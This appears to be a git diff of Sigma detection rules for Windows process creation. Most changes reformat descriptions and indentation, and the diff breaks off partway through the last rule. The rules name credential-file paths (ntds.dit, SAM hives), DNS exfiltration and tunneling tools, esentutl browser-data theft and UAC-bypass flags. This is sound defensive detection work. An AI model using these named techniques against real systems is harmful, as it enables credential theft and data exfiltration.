b/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml index 756bdf580..00f53b185 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml @@ -1,9 +1,7 @@ title: Dllhost.EXE Execution Anomaly id: e7888eb1-13b0-4616-bd99-4bc0c2b054b9 status: experimental -description: Detects a "dllhost" process spawning with no commandline arguments which - is very rare to happen and could indicate process injection activity or malware - mimicking similar system processes. +description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. references: - https://redcanary.com/blog/child-processes/ - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 @@ -22,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - dllhost.exe - dllhost - NewProcessName|endswith: \dllhost.exe + NewProcessName|endswith: \dllhost.exe filter_main_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml index 51579d9e2..8156b91ab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \iodine.exe - - NewProcessName|contains: \dnscat2 + - NewProcessName|endswith: \iodine.exe + - NewProcessName|contains: \dnscat2 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml index 862386628..baedb09a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml @@ -1,9 +1,7 @@ title: Unusual Child Process of dns.exe id: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 status: test -description: Detects an unexpected process spawning from dns.exe which may indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html author: Tim Rauch @@ -22,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \dns.exe filter: - NewProcessName|endswith: \conhost.exe + NewProcessName|endswith: \conhost.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml index b3465f977..f87e4b024 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,8 +1,7 @@ title: Potential Discovery Activity Via Dnscmd.EXE id: b6457d63-d2a2-4e29-859d-4e7affc153d1 status: test -description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones - of a domain. DNS zones used to host the DNS records for a particular domain. +description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records @@ -22,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \dnscmd.exe + NewProcessName|endswith: \dnscmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - /enumrecords - /enumzones - /ZonePrint diff --git a/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml b/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml index 10b6e8221..9d2410d85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived status: test -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -27,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /config - /serverlevelplugindll - NewProcessName|endswith: \dnscmd.exe + NewProcessName|endswith: \dnscmd.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml index 51f695586..9c0c67164 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dotnet-trace.exe - - OriginalFileName: dotnet-trace.dll + - NewProcessName|endswith: \dotnet-trace.exe + - OriginalFileName: dotnet-trace.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-- ' - collect condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml b/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml index 5b0fb1eac..d7bbe3fd8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_driverquery_recon.yml @@ -1,11 +1,10 @@ title: Potential Recon Activity Using DriverQuery.EXE id: 9fc3072c-dc8f-4bf7-b231-18950000fadd related: - - id: a20def93-0709-4eae-9bd2-31206e21e6b2 - type: similar + - id: a20def93-0709-4eae-9bd2-31206e21e6b2 + type: similar status: experimental -description: Detect usage of the "driverquery" utility to perform reconnaissance on - installed drivers +description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ @@ -23,19 +22,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: driverquery.exe - - OriginalFileName: drvqry.exe + - NewProcessName|endswith: driverquery.exe + - OriginalFileName: drvqry.exe selection_parent: - - ParentProcessName|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentProcessName|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - ParentProcessName|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentProcessName|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by some scripts might trigger this as well diff --git a/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml b/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml index 0c32c1ffc..7ca6a06ad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_driverquery_usage.yml @@ -1,11 +1,10 @@ title: DriverQuery.EXE Execution id: a20def93-0709-4eae-9bd2-31206e21e6b2 related: - - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd - type: similar + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + type: similar status: experimental -description: Detect usage of the "driverquery" utility. Which can be used to perform - reconnaissance on installed drivers +description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ @@ -23,21 +22,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: driverquery.exe - - OriginalFileName: drvqry.exe - filter_main_other: - - ParentProcessName|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentProcessName|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - NewProcessName|endswith: driverquery.exe + - OriginalFileName: drvqry.exe + filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting + - ParentProcessName|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentProcessName|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate use by third party tools in order to investigate installed drivers -level: medium +level: medium # Level could be reduced to low if this utility is often used in your environment ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml index a764f0ff0..77bd7d82a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml @@ -19,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - NewProcessName|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_flag: - CommandLine|contains: ' /G ' + CommandLine|contains: ' /G ' selection_permissions: - CommandLine|contains: + CommandLine|contains: # Add more permissions as you see fit in your environment - GR - GE - GW diff --git a/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml b/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml index a1750cf4b..db2ba12a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - NewProcessName|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/passwd:' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml b/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml index 201bfe892..e35db3dd7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsim_remove.yml @@ -1,8 +1,7 @@ title: Dism Remove Online Package id: 43e32da2-fdd0-4156-90de-50dfd62636f9 status: test -description: Deployment Image Servicing and Management tool. DISM is used to enumerate, - install, uninstall, configure, and update features and packages in Windows images +description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html @@ -23,12 +22,20 @@ detection: ParentCommandLine|contains|all: - /Online - /Disable-Feature - NewProcessName|endswith: \DismHost.exe + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet + NewProcessName|endswith: \DismHost.exe selection_dism: - CommandLine|contains|all: + CommandLine|contains|all: - /Online - /Disable-Feature - NewProcessName|endswith: \Dism.exe + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet + NewProcessName|endswith: \Dism.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate script diff --git a/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml index 603ac6929..80ee0de61 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml @@ -1,10 +1,10 @@ title: Domain Trust Discovery Via Dsquery id: 3bad990e-4848-4a78-9530-b427d854aac0 related: - - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects execution of "dsquery.exe" for domain trust discovery references: @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \dsquery.exe - - OriginalFileName: dsquery.exe + - NewProcessName|endswith: \dsquery.exe + - OriginalFileName: dsquery.exe selection_cli: - CommandLine|contains: trustedDomain + CommandLine|contains: trustedDomain condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the utilities by legitimate user for legitimate reason diff --git a/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml index 67d9f5fdd..42803654e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml @@ -1,8 +1,7 @@ title: Suspicious Kernel Dump Using Dtrace id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 status: test -description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, - which is available on Windows systems since Windows 10 19H1 +description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 references: - https://twitter.com/0gtweet/status/1474899714290208777?s=12 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_plain: - CommandLine|contains: lkd(0) - NewProcessName|endswith: \dtrace.exe + CommandLine|contains: lkd(0) + NewProcessName|endswith: \dtrace.exe selection_obfuscated: - CommandLine|contains|all: + CommandLine|contains|all: - syscall:::return - lkd( condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml index d1a4297f7..73a6de62b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml @@ -1,8 +1,7 @@ title: DumpMinitool Execution id: dee0a7a3-f200-4112-a99b-952196d81e42 status: experimental -description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of - process memory via the use of the "MiniDumpWriteDump" +description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" references: - https://twitter.com/mrd0x/status/1511415432888131586 - https://twitter.com/mrd0x/status/1511489821247684615 @@ -23,16 +22,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - NewProcessName|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' diff --git a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml index c18ca0e64..282f64e30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml @@ -21,29 +21,28 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - NewProcessName|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe filter_folder: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio\ - - \Extensions\ + - \Extensions\ # https://github.com/microsoft/vstest/blob/b2e2126f1aa7e5753cafe9515563c99ade6a59ce/src/package/nuspec/Microsoft.TestPlatform.Portable.nuspec#L159 susp_flags: - CommandLine|contains: .txt + CommandLine|contains: .txt cmd_has_flags: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' filter_cmd_misses_flags: - CommandLine|contains: --dumpType - condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags - or ( cmd_has_flags and not filter_cmd_misses_flags ) )) + CommandLine|contains: --dumpType + condition: process_creation and (selection and ( ( not filter_folder ) or susp_flags or ( cmd_has_flags and not filter_cmd_misses_flags ) )) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml index 0024260af..4df0744bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_params.yml @@ -1,9 +1,7 @@ title: Esentutl Gather Credentials id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 status: test -description: Conti recommendation to its affiliates to use esentutl to access NTDS - dumped file. Trickbot also uses this utilities to get MSEdge info via its module - pwgrab. +description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. references: - https://twitter.com/vxunderground/status/1423336151860002816 - https://attack.mitre.org/software/S0404/ @@ -23,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - esentutl - ' /p' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml index bfdf0674b..a184774ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml @@ -1,8 +1,7 @@ title: Copying Sensitive Files with Credential Data id: e7be6119-fc37-43f0-ad4f-1f3f99be2f9f status: test -description: Files with well-known filenames (sensitive files with credential data) - copying +description: Files with well-known filenames (sensitive files with credential data) copying references: - https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/ - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -24,19 +23,19 @@ detection: EventID: 4688 Channel: Security selection_esent_img: - - NewProcessName|endswith: \esentutl.exe - - OriginalFileName: \esentutl.exe + - NewProcessName|endswith: \esentutl.exe + - OriginalFileName: \esentutl.exe selection_esent_cli: - CommandLine|contains: + CommandLine|contains: - vss - ' /m ' - ' /y ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - \windows\ntds\ntds.dit - \config\sam - \config\security - - '\config\system ' + - '\config\system ' # space needed to avoid false positives with \config\systemprofile\ - \repair\sam - \repair\system - \repair\security @@ -45,7 +44,6 @@ detection: - \config\RegBack\security condition: process_creation and (all of selection_esent_* or selection_susp_paths) falsepositives: - - Copying sensitive files for legitimate use (eg. backup) or forensic investigation - by legitimate incident responder or forensic invetigator + - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml b/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml index 7c6c2e14f..c2bf9a816 100644 --- a/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml +++ b/sigma/builtin/process_creation/proc_creation_win_esentutl_webcache.yml @@ -1,8 +1,7 @@ title: Esentutl Steals Browser Information id: 6a69f62d-ce75-4b57-8dce-6351eb55b362 status: test -description: One way Qbot steals sensitive information is by extracting browser data - from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe +description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ - https://redcanary.com/threat-detection-report/threats/qbot/ @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \esentutl.exe - - OriginalFileName: esentutl.exe + - NewProcessName|endswith: \esentutl.exe + - OriginalFileName: esentutl.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - /r - -r selection_webcache: - CommandLine|contains: \Windows\WebCache + CommandLine|contains: \Windows\WebCache condition: process_creation and (all of selection*) falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml index d8ebd7bf9..994edfade 100644 --- a/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Event Viewer Child Process id: be344333-921d-4c4d-8bb8-e584cf584780 related: - - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 - type: derived + - id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 + type: derived status: test -description: Detects uncommon or suspicious child processes of "eventvwr.exe" which - might indicate a UAC bypass attempt +description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 @@ -27,7 +26,7 @@ detection: selection: ParentProcessName|endswith: \eventvwr.exe filter_main_generic: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\mmc.exe - :\Windows\System32\WerFault.exe - :\Windows\SysWOW64\WerFault.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml b/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml index a85e38e1f..3dc23ce70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \plink.exe - \socat.exe - \stunnel.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml b/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml index 4a3ee084b..43bbd4dcf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Cabinet File Expansion id: 9f107a84-532c-41af-b005-8d12a607639f status: test -description: Detects the expansion or decompression of cabinet files from potentially - suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks references: - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ @@ -20,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains: + CommandLine|contains: - '/F:' - '-F:' - NewProcessName|endswith: \expand.exe + NewProcessName|endswith: \expand.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \Temporary Internet @@ -34,20 +33,20 @@ detection: - \AppData\Roaming\Temp - :\Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ filter_optional_dell: - CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ + # Launched by Dell ServiceShell.exe + CommandLine|contains: C:\ProgramData\Dell\UpdateService\Temp\ ParentProcessName: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe - condition: process_creation and (selection_cmd and 1 of selection_folders_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*) falsepositives: - System administrator Usage level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml index 61088e9c0..45a50f257 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml @@ -1,20 +1,15 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test -description: 'Detects a command line process that uses explorer.exe to launch arbitrary - commands or binaries, - - which is similar to cmd.exe /c, only it breaks the process tree and makes its - parent a new instance of explorer spawning from "svchost" - - ' +description: | + Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, + which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - @gott_cyber +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber date: 2019/06/29 modified: 2022/09/20 tags: @@ -28,10 +23,13 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} - - CommandLine|contains|all: - - explorer.exe - - ' /root,' + # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference + - CommandLine|contains: /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - explorer.exe + - ' /root,' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml index 9adfa3d63..f1df08c48 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: explorer.exe - NewProcessName|endswith: \explorer.exe + CommandLine|contains: explorer.exe + NewProcessName|endswith: \explorer.exe ParentProcessName|endswith: \cmd.exe condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml b/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml index 5ceaea196..c68682784 100644 --- a/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml +++ b/sigma/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml @@ -1,9 +1,7 @@ title: Explorer NOUACCHECK Flag id: 534f2ef7-e8a2-4433-816d-c91bccde289b status: test -description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag - that allows to run all sub processes of that newly started explorer.exe without - any UAC checks +description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks references: - https://twitter.com/ORCA6665/status/1496478087244095491 author: Florian Roth (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /NOUACCHECK - NewProcessName|endswith: \explorer.exe + CommandLine|contains: /NOUACCHECK + NewProcessName|endswith: \explorer.exe filter_dc_logon: - - ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s 